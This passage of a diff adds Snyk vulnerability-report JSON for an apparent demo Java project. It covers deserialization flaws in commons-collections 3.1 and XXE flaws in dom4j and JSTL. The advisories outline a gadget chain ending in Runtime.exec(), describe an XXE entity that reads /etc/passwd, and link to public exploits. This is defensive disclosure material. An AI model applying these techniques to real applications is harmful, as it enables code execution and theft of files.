"commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + 
"assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## 
Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. 
Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. 
The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + 
"name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + 
"severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"commons-collections:commons-collections@3.1" + ], + "upgradePath": [ + false, + "commons-collections:commons-collections@3.2.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": 
"2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + 
], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. 
These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + 
"CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## 
Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": 